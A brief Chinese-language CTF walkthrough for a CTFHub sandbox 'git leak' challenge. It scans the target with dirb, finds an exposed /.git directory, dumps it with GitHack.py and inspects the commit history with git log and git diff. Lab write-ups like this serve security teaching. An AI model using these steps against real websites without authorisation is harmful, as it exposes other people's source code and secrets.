git泄露操作

133 阅读1分钟

第一步

拿到一个网站之后要扫

dirb http://challenge-f43ba48659527fd3.sandbox.ctfhub.com:10800

之后就可以找到另一个网站了。

http://challenge-f43ba48659527fd3.sandbox.ctfhub.com:10800/.git/HEAD (CODE:200|SIZE:23)

这个里面就有我们需要的git,之后我们就要下载下来

python GitHack.py http://challenge-f43ba48659527fd3.sandbox.ctfhub.com:10800/.git/

然后我们就要寻找。git文件,

find / -name .git

然后展示所有的提交

git log

通过(XXXX 是提交序列)比较提交序列之间文件的不同,找到自己想要的东西。

git diff XXXX